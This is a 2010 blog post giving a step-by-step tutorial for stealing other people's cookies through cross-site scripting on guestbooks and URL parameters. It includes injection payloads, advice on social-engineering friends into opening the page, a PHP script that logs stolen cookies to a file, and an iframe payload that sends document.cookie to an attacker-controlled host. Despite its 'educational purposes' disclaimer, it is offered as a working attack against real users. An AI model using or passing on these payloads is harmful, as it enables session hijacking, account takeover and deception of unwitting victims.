Infolink

Monday, November 29, 2010

Stealing Cookies by XXS

0×10 Introduction

XSS (cross site scripting) is usually criticized. It is said that XSS can do nothing, actually. All it can do is make a nice little alert box on your screen, telling you your cookies. That is a wrong assumption. Although it may be slightly difficult, you can use XSS to steal a user’s cookies. Cookies are used to store valuable information such as Username, Password, IP address and much more. This tutorial aims at teaching you Cookie Stealing, and by the end of this text file, you should be able to independently steal other people’s cookies.

DISCLAIMER:
This text is for educational purposes only. The author will not be held liable for any damages that occur from a reader for following this text or even learning from it.
######################################################

0×20 Finding the vulnerability

First, you have to find the XSS vulnerability. This may prove to be a bit of a challenge, but for sites with lower security, this is actually quite easy. For example, have you ever seen one of those guestbooks? Some of them are not properly configured to filter the text you type in. What does this mean? It means that you can manipulate the HTML of the page, and inject javascript code! Alright, let’s start off with something simple. Type this into the guestbook:
<script type=”text/javascript”>
alert(document.cookie)
</script>
Okay, now that’s done, click enter. If the guestbook does not properly check its input, then you should be able to see your cookie pop up! Of course, if you type that in and it doesn’t work, its probably gonna be a bit embarrassing, especially when the site admin taunts you. Anyway, to test whether a guestbook properly filters its input, type something like “You guys <b>suck</b>.” and see if the “suck” comes up in bold text.
If it does, the guestbook is probably not configured to filter input. However, XSS is not limited to guest books. Places in which you can change the HTML such as a page that uses a URL parameter to display an image or text, can be injected with a healthy dose
of XSS. For example, the URL is this:
site/bla.php?whatever=lol.gif
Now, imagine what the HTML for the image would be like…
<img src=”lol.gif”>
so they add a “> at the back, which means we can do this:
(start URL here)
site/bla.php?whatever=lol.gif”><script type=”text/javascript”>
alert(document.cookie)</script><a href=”test
(End url here)
and you’re done!

######################################################

0×30 Opening the gate

(This chapter is only for those who chose the URL as the XSS injection point, by the way)
Alright, all this is nice and pretty, but as I have said at the top, people criticize XSS as it can only work in your browser.
This means that to get an enemy’s password, you have to get him to sit down, login, and go to the injection page, then show you the alert box. Forgive my language, but like HELL that’s going to work. You have to be smart. You have to TRICK them into going into the page, and then use a technique I will explain in a later section to get their cookies.
This tricking technique is something known as social engineering. Don’t worry; it’s not
complicated at all. All you have to do is fool your friend. For example, if the page you are fooling him into going into is the guestbook, then you can say something like “Look at this cool guestbook! (insert URL here)” Be Creative. Don’t do it yet though, we still have the last piece of preparation to go…
######################################################

0×40 The Stealing

But once the luser goes to the site, what do you do then? “Hey, tell me all that info in that suspicious looking text box please?” Yeah right.
This is where the PHP code comes in. Get a free web host that supports PHP (preferably something like www.t35.com, although you will be breaking the rules in their TOS…) and make a new file. In the new file, type in this:


<html>

<body>

<?php

$stuff=$_GET['stuff'] . "\n";

$fh=fopen('evil.txt','ab');

fwrite($fh,$stuff);

fclose($fh);

?>

</body>

</html>



Wheee that was fun. Alright, save it as evil.php. Now make an empty text file named evil.txt, and type some stuff into it such as “Cookie Stealer Phile (Newline here)”. Alright, now you have to change the script that you put into the vulnerable site. Change it to

<IFRAME SRC=”javascript:window.location=%22(site)/evil.php?stuff=%22+document.cookie” height=”1″ width=”1″ frameborder=”0″></IFRAME>

Of course, change (site) into your site, and you are ready to go! Whenever a new luser gets lured into the trap, his cookies will be added to evil.txt!

No comments:

Post a Comment